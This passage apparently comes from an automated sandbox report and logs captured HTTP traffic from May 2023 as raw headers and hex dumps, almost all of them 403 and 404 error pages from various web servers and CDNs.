7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:06 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:07 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:52:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 15855f89-f8ec-4cfb-a060-a4aa57e9b9dfCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uOpVVuNIz2aMpX6Gan80reQ5Pi4sIS9eivVSw1Eq2k4sfCiPdA932PAR6BcXvv0b8O74QweuceHpTFkRMf2Cyuin2xfW%2Fvl9Dk7xz8mX4B4U0V%2BO5SCJnQ%2BllgOp0xc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=138.000011Server: cloudflareCF-RAY: 7cff5a287d4d18df-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:07 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=47gqQhP1rFWItYx99i4GOm%2FY4cSp1PYxL5gQIFBxzPBasTy22G0gdGsQPZMmrAJ0Bzrl4fEHuOLmSH6A9nibQLIFpymRNj1KXodyveCS1i5ySL3Iz4nwMB%2FjmrZf9n6q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a29582f2bda-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:07 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iGFb4ttO0T0DPL4WRLVxWNp8yAeyLcPGzGKWwkffk3SY1vlU1ZjwYDxgZwyDOOLZMyvicLxEdSJ081mQV7BC6Hw2%2F0%2FluImFYapMhubvFVOXvHhPtyjPfOdrNkaGsW%2BM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a29a8872bda-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:07 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 31 May 2023 12:52:08 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fG40g0EjeJLxqXjPkDellDZZahb2pHSNNZBONXyJreUYpWekRDlPlZg%2B5MmmDu6s7m7ma0CjfNI5lr2w2PQfCKCUv6Ttc4FlBcBvkWAaJusJe0HQwzQn1Af6tg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5a2f19632c3d-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d Data Ascii: 1925<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 72d89871ef4f31293c0ade06cde69b111521752fServer: ZENEDGEX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Wed, 31 May 2023 12:52:08 GMTData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 33 38 31 22 2c 20 31 36 38 35 35 33 37 34 37 36 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2381", 1685537476, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:52:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
